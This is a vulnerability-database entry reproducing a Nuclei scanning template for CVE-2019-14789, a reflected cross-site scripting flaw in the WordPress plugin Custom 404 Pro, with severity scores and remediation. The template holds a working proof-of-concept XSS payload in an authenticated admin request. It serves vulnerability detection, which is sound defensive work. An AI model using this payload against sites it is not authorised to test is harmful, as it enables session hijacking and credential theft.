Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-14789
HistoryJul 07, 2023 - 9:38 a.m.

Custom 404 Pro < 3.2.8 - Cross-Site Scripting

2023-07-0709:38:49
ProjectDiscovery
github.com
4
cve2019
wpscan
custom-404-pro
wordpress
authenticated
xss
kunalnagar
session-hijacking
theft
security-vulnerability

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

47.2%

Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2019-14789

info:
  name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd
    - https://wordpress.org/plugins/custom-404-pro/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14789
    - https://wordpress.org/plugins/custom-404-pro/#developers
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-14789
    cwe-id: CWE-79
    epss-score: 0.00125
    epss-percentile: 0.46981
    cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: kunalnagar
    product: custom_404_pro
    framework: wordpress
  tags: cve,cve2019,wpscan,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
          - 'contains(body_2, "Custom 404 Pro")'
        condition: and
# digest: 4a0a00473045022100bcc2bda6a9772bf00724aef8ea1e14be069dcd1b5329641d80e3612067c1aeef022063ccdde02fc45ecdb2fccb786f860f06ef162fd3572c88d3af98b8706774fd7d:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

47.2%

Related for NUCLEI:CVE-2019-14789